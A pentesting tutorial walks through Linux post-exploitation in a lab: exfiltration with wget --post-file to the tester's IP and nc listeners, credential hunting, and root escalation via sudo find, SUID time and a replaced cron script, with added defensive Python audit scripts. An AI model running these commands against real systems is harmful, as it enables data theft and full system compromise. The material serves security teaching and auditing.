Pentesting: Post-Exploitation.

Data Exfiltration (download).

Data exfiltration - also known as data extrusion or data exportation - is data theft: the intentional, unauthorized, covert transfer of data from a computer or other device.

FTP (File Transfer Protocol) services are not always available on the attacked machine, but data can still be downloaded / exfiltrated using tools such as wget and/or nc.

Some files cannot be viewed in a terminal, .jpg images for example. To examine these, we first need to download them.

We set up a listener on the pentester's computer.



We compress the desired folder and, without writing it to disk (leaving no tracks), immediately transfer it to the pentester's computer using the nc command.



We can see that the file (the 'original' folder compressed into one file) was successfully transferred to the pentester's machine.



The md5sum tool can be used to verify the integrity of the downloaded file. The command usage is as follows:

md5sum yourfile


The wget command that sends a file from the attacked machine to the pentester's machine is as follows:

wget --post-file yourfile http://10.0.0.1:8888/

(where 10.0.0.1 is the pentester's machine IP address, and 8888 is the port on which we listen on the pentester's machine).


We execute the above command on the attacked machine, from the reverse shell. As in the nc example above, we need to set up a listener on the pentester's machine before the transfer, using the following command:

nc -lp 8888 > yourfile


We may need to terminate the listening process after the transfer using CTRL+C (or Command+C on Macintosh computers) on the pentester's machine.

When using wget to exfiltrate a file, the first 9 lines need to be removed, as these are the HTTP headers that wget adds at the beginning of the received file. We can use the command:

tail -n +10 yourfile > yourfile-new


After this operation, the md5 checksum should be the same on both the attacked machine and the pentester's machine.
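As an added worked example (not part of the original post), the following Python script shows why cutting a fixed number of lines is fragile: the HTTP headers end at the first blank line, and the number of header lines depends on the wget version and options. The constructed capture below models what the nc listener writes to disk; the header names and values are an assumption, not taken from the post. The script cuts at the blank line, honours Content-Length, and compares the md5 checksum the way the post does with md5sum, so a transfer with a different header count still verifies.

```python
"""Recover a file from a raw HTTP POST capture and verify its checksum."""
import hashlib

# Constructed sample of what `nc -lp 8888 > yourfile` would write when
# `wget --post-file` sends a 28-byte text file. Seven header lines here;
# the header values are assumed, not captured from the page.
CAPTURED = (
    b"POST / HTTP/1.1\r\n"
    b"User-Agent: Wget/1.21\r\n"
    b"Accept: */*\r\n"
    b"Host: 10.0.0.1:8888\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 28\r\n"
    b"\r\n"
    b"line one\nline two\nline three"
)

# The file the sender had, so the example can show the checksum matching.
ORIGINAL = b"line one\nline two\nline three"


def extract_body(raw: bytes) -> bytes:
    """Return the request body: everything after the first blank line.

    Works for any number of header lines, unlike a fixed `tail -n +10`.
    """
    sep = raw.find(b"\r\n\r\n")
    if sep == -1:
        raise ValueError("no end-of-headers marker found")
    headers, body = raw[:sep], raw[sep + 4:]
    # Honour Content-Length when present so stray trailing bytes the
    # listener may have captured are not treated as part of the file.
    for line in headers.split(b"\r\n"):
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            body = body[: int(value.strip())]
    return body


def tail_skip(raw: bytes, start_line: int) -> bytes:
    """Emulate `tail -n +N`: keep everything from line N on, whatever it holds."""
    return b"\n".join(raw.split(b"\n")[start_line - 1:])


def md5_hex(data: bytes) -> str:
    """Same digest `md5sum` prints, for comparison with the source host."""
    return hashlib.md5(data).hexdigest()


def verify(raw: bytes, expected_md5: str) -> bool:
    """True when the recovered body matches the checksum taken on the source."""
    return md5_hex(extract_body(raw)) == expected_md5


if __name__ == "__main__":
    print("blank-line cut verifies:", verify(CAPTURED, md5_hex(ORIGINAL)))
    # With seven header lines, `tail -n +10` drops the first line of the file.
    print("tail -n +10 verifies:", md5_hex(tail_skip(CAPTURED, 10)) == md5_hex(ORIGINAL))
```

The checksum comparison is the part to keep regardless of how the headers are removed: a silently truncated or header-polluted file is indistinguishable from a good one without it.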


Files & Data Transfer (upload).

When we want to upload tools to the attacked machine, first we need to check what tools are available on the target machine.

The command to check whether a tool is available is:

which tooltocheck


The most common tools to use when ftp is not available are nc & grep.

A list of tools, their functionality and usage details can be found on the GTFOBins page.


For example, we can transfer the linpeas.sh script to the attacked machine using the wget command:


The LinPEAS script, when executed on a target machine, collects various information and can be helpful for continuing the attack.

To execute this script, first we need to give it execute permission.



Now let's execute it, directing the output to a 'results.txt' file.



Now let's search for the 'pass' pattern in the results file, using the command: cat results.txt | grep pass



We have found credentials for the user rkowalski! Let's log in (switch user) and list the contents of the 'flag.txt' file that we were aiming for. Not every user has the privilege to read this file, but rkowalski does.




Privilege Escalation - Passwords & Keys.

The technique we explain in this section is called 'Credentials Hunting'.

After we gain an 'initial foothold' on the attacked machine, we can search various locations and data for passwords & keys.

First, we can check the history of executed commands using the 'history' command.

Then we can check environment variables using the 'env' command.

Then we can look for config files. Sometimes these contain useful information such as hard-coded credentials.

Then we can use the found history data to switch user from www-data to rkowalski@localhost.

Now we continue our attack from the rkowalski@localhost account. We will try to search for ssh keys.

We did find a stored ssh key!

Then we can look at the users list in the /etc/passwd file. Perhaps the ssh key will let us connect via ssh as one (or more) of these users.

Let's try to login to the 'root' account.

Failure at this point. To use ssh, we need to spawn a better terminal and run ssh from it.

Let's spawn a 'bash' terminal using the command 'script -qc /bin/bash', and try to log in as root@localhost again.

Success!!!

We've gained access as the root user!

System fully compromised.
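The credentials-hunting steps above (history, env, config files, ssh keys) are exactly the places a defender should sweep before an attacker does. As an added example, not part of the original post, the Python script below runs that sweep over a constructed shell history and a constructed env dump: it flags history lines that embed a password or point at a private key, flags environment variables whose name suggests a secret, and redacts values so the report can be shared. All sample commands, variable names and values are invented for the example.

```python
"""Flag credential leakage in shell history and environment dumps (added example)."""
import re

# Constructed samples: commands and values are invented, not taken from the page.
HISTORY_SAMPLE = """\
ls -la
mysql -u app -pS3cretPass! appdb
export DB_PASSWORD=hunter2
ssh -i /home/rkowalski/.ssh/id_rsa root@localhost
cat /etc/passwd
"""
ENV_SAMPLE = """\
HOME=/var/www
API_TOKEN=abc123def456
PATH=/usr/bin:/bin
"""

# Variable names that suggest a secret value.
SECRET_NAME = re.compile(r"pass(word|wd)?|secret|token|api[_-]?key|private", re.I)

# Command-line shapes that embed a secret or reference a private key.
HISTORY_PATTERNS = [
    ("inline mysql password", re.compile(r"\bmysql\b.*\s-p\S+")),
    ("--password on command line", re.compile(r"--password[= ]\S+")),
    ("exported secret", re.compile(r"\bexport\s+\w*(pass|secret|token|key)\w*=", re.I)),
    ("private key referenced", re.compile(r"\s-i\s+\S+")),
]


def scan_history(text):
    """Return (line number, reason) for each history line that leaks a credential."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for reason, pattern in HISTORY_PATTERNS:
            if pattern.search(line):
                findings.append((n, reason))
                break  # one reason per line is enough for the report
    return findings


def scan_env(text):
    """Return (line number, variable name) for env entries whose name suggests a secret."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        name, _, value = line.partition("=")
        if value and SECRET_NAME.search(name):
            findings.append((n, name))
    return findings


def redact(line):
    """Mask the value in KEY=VALUE and -pVALUE forms so findings can be shared safely."""
    line = re.sub(r"(=)\S+", r"\1***", line)
    return re.sub(r"(\s-p)\S+", r"\1***", line)


if __name__ == "__main__":
    history_lines = HISTORY_SAMPLE.splitlines()
    for n, reason in scan_history(HISTORY_SAMPLE):
        print(f"history line {n}: {reason}: {redact(history_lines[n - 1])}")
    for n, name in scan_env(ENV_SAMPLE):
        print(f"env line {n}: secret-looking variable {name}")
```

The history findings are the cases this post exploits in the lab: a password typed on a command line survives in ~/.bash_history, and an `export` of a secret survives in both history and the environment of every child process. Clearing history, passing secrets via files with tight permissions, and keeping private keys at mode 0600 closes all three.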


Privilege Escalation - Sudo.

After we gain an 'initial foothold' on the attacked machine, we can check whether there are 'sudo-able' commands on the system. The command that does this is 'sudo -l'.

There's one command that we (user rkowalski) can execute with sudo: the 'find' command.

Let's check on the GTFOBins webpage how this command can be abused.

We can see that the 'find' command can be abused to spawn a shell with root privileges via the 'sudo' command.

In our case, the command is: 'sudo /usr/bin/find . -exec /bin/bash \; -quit'.

Let's do it.

Success!!!

We've gained access as the root user!

System fully compromised.


Privilege Escalation - SUID.

After we gain an 'initial foothold' on the attacked machine, we can check whether there are tools with the 'SUID' bit set.

When we execute a command with the SUID bit set, it runs with the file owner's privileges instead of the privileges of the user that executed it.

The command to search for tools with the SUID bit set is: 'find / -perm -4000 2>/dev/null'.

Let's check these commands on the GTFOBins webpage.

We find that the 'time' command is vulnerable to the SUID-based attack.

Let's try this attack.

In our case, the command would be: '/usr/bin/time /bin/bash -p'.

Success!!!

We've gained access as the root user!

System fully compromised.
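The sudo and SUID sections both come down to the same audit question: which programs that can run with root privileges are able to drop into a shell? As an added example (not code from the original post), the Python script below takes constructed `sudo -l` output and constructed `find / -perm -4000` output, parses the sudo rules, compares the SUID list with a baseline, and flags entries whose program is in a small shell-capable set. That set holds only the binaries this post names (find, time) plus bash; a real audit would extend it from GTFOBins. The sample output, baseline and rule format are assumptions modelled on sudo's and find's normal output, not captured from the lab.

```python
"""Audit sudo rules and SUID binaries for shell-capable programs (added example)."""
import os
import re

# Binaries documented on GTFOBins as able to spawn a shell when run with
# elevated rights. The page names find and time; bash is the obvious third.
# Extend this set from GTFOBins for a real audit.
SHELL_CAPABLE = {"find", "time", "bash"}

# Constructed sample of `sudo -l` output (format modelled on sudo, values invented).
SUDO_L_SAMPLE = """\
Matching Defaults entries for rkowalski on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

User rkowalski may run the following commands on localhost:
    (root) NOPASSWD: /usr/bin/find
    (root) /usr/bin/apt-get update
"""

# Constructed sample of `find / -perm -4000 2>/dev/null` output.
SUID_SAMPLE = """\
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/time
/usr/bin/find
"""

# SUID files expected on this host. In practice this comes from a golden
# image or package manifests; here it is constructed for the example.
SUID_BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su"}

# One sudo rule line: "(runas) [NOPASSWD:] command [args]".
RULE_RE = re.compile(r"\s*\((?P<runas>[^)]*)\)\s*(?:NOPASSWD:\s*)?(?P<cmd>.+)")


def sudo_rules(sudo_l_output):
    """Return (runas, command) pairs from the 'may run the following commands' block."""
    rules, in_rules = [], False
    for line in sudo_l_output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        match = RULE_RE.match(line)
        if in_rules and match:
            rules.append((match.group("runas"), match.group("cmd").strip()))
    return rules


def risky_sudo_rules(sudo_l_output):
    """Rules that grant ALL, or a command whose program is shell-capable."""
    risky = []
    for runas, cmd in sudo_rules(sudo_l_output):
        program = os.path.basename(cmd.split()[0])
        if cmd == "ALL" or program in SHELL_CAPABLE:
            risky.append((runas, cmd))
    return risky


def unexpected_suid(find_output, baseline):
    """SUID files missing from the baseline, tagged when they are shell-capable."""
    findings = []
    for path in sorted(set(find_output.split()) - baseline):
        note = "shell-capable" if os.path.basename(path) in SHELL_CAPABLE else "review"
        findings.append((path, note))
    return findings


if __name__ == "__main__":
    for runas, cmd in risky_sudo_rules(SUDO_L_SAMPLE):
        print(f"sudo rule to remove or narrow: ({runas}) {cmd}")
    for path, note in unexpected_suid(SUID_SAMPLE, SUID_BASELINE):
        print(f"unexpected SUID binary: {path} [{note}]")
```

The baseline comparison matters more than the shell-capable list: a SUID bit on a binary that has no business carrying one (time here) is a finding whether or not a public shell escape is known for it, and `chmod u-s` on the file is the fix. For the sudo rule, the remedy is to grant the specific invocation the user needs rather than the bare binary.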


Privilege Escalation - CRON.

After we gain an 'initial foothold' on the attacked machine, we can use the CRON tool to execute a script with root privileges. For example, we can copy the /bin/bash command to a chosen directory and set its SUID bit, so that when we execute it, it runs with root privileges.

First, let's check the CRON configuration file, named 'crontab'. It's located in the '/etc/' directory.

It seems that CRON executes the /opt/backup/backup.sh script every minute, with root privileges.

Let's list the /opt/backup/backup.sh file's contents.

Using the 'ls -la' command, we confirm that the '/opt/backup' directory has permissions that allow creating files inside it with the 'execute' flag set.

The '/opt/backup/backup.sh' file itself cannot be modified by a non-root user, however.

Let's move the '/opt/backup/backup.sh' file to '/opt/backup/backup.sh.bak', so we can create our own '/opt/backup/backup.sh' file in its place.

Now let's create the '/opt/backup/backup.sh' file with the following contents:

#!/bin/bash
cp /bin/bash /tmp/rootbash && chmod +x /tmp/rootbash

Let's give +x permissions to our new '/opt/backup/backup.sh' file:

chmod +x /opt/backup/backup.sh

After a minute, the '/tmp/rootbash' file was created with the SUID bit set.

Let's execute it with the -p parameter, to keep the file owner's (root user's) privileges.

/tmp/rootbash -p

Success!!!

We've gained access as the root user!

System fully compromised.
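The weakness this section exploits is not cron itself but a root job whose script sits in a directory other users can write to, so the script can be renamed and replaced even though the file itself is not writable. As an added example (not code from the original post), the Python script below audits a system crontab for exactly that: it parses the job lines, and for every job with an absolute script path checks whether the script or its parent directory carries group/world write bits. To run offline it stages a temporary directory tree reproducing the lab layout (a world-writable /opt/backup holding a non-writable backup.sh) and then applies the fix. The crontab content is constructed; the check looks only at permission bits and does not verify that the owner is root.

```python
"""Audit cron jobs whose script can be replaced by an unprivileged user (added example)."""
import os
import stat
import tempfile

# Constructed /etc/crontab content in the system-crontab format
# (five time fields, user, command); the backup job mirrors the page's lab.
CRONTAB_SAMPLE = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
* * * * * root /opt/backup/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
"""


def cron_jobs(crontab_text):
    """Return (user, command) for each job line; variables and comments are skipped."""
    jobs = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        # @reboot/@daily style lines have one schedule field instead of five.
        special = line.startswith("@")
        fields = line.split(None, 2) if special else line.split(None, 6)
        if len(fields) == (3 if special else 7):
            jobs.append((fields[-2], fields[-1]))
    return jobs


def writable_by_others(path):
    """True when group or world write bits are set (ownership is not checked)."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def risky_jobs(crontab_text, root="/"):
    """Jobs whose script, or the directory holding it, non-owners can modify.

    `root` lets the check run against a staged tree instead of the live filesystem.
    """
    findings = []
    for user, command in cron_jobs(crontab_text):
        target = command.split()[0]
        if not target.startswith("/"):
            continue  # resolved via PATH; out of scope for this check
        path = os.path.join(root, target.lstrip("/"))
        if not os.path.exists(path):
            continue
        reasons = []
        if writable_by_others(path):
            reasons.append("script writable")
        if writable_by_others(os.path.dirname(path)):
            reasons.append("directory writable (script can be replaced)")
        if reasons:
            findings.append((user, target, reasons))
    return findings


def stage_lab_tree():
    """Build a temporary tree reproducing the page's misconfiguration:
    /opt/backup is world-writable while backup.sh itself is not."""
    root = tempfile.mkdtemp()
    backup_dir = os.path.join(root, "opt", "backup")
    os.makedirs(backup_dir)
    script = os.path.join(backup_dir, "backup.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\necho backup\n")
    os.chmod(script, 0o755)
    os.chmod(backup_dir, 0o777)
    return root


def harden(root, directory):
    """Strip group/world write from a directory: the fix for this finding."""
    path = os.path.join(root, directory.lstrip("/"))
    mode = stat.S_IMODE(os.stat(path).st_mode)
    os.chmod(path, mode & ~(stat.S_IWGRP | stat.S_IWOTH))
    return not writable_by_others(path)


if __name__ == "__main__":
    lab = stage_lab_tree()
    for user, target, reasons in risky_jobs(CRONTAB_SAMPLE, lab):
        print(f"{user} runs {target}: {', '.join(reasons)}")
    harden(lab, "/opt/backup")
    print("after hardening:", risky_jobs(CRONTAB_SAMPLE, lab))
```

Against the live system the same function is called with the real /etc/crontab text and the default root of "/"; the per-user crontabs under /var/spool/cron and the /etc/cron.d fragments use the same line formats and can be fed through `cron_jobs` unchanged.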
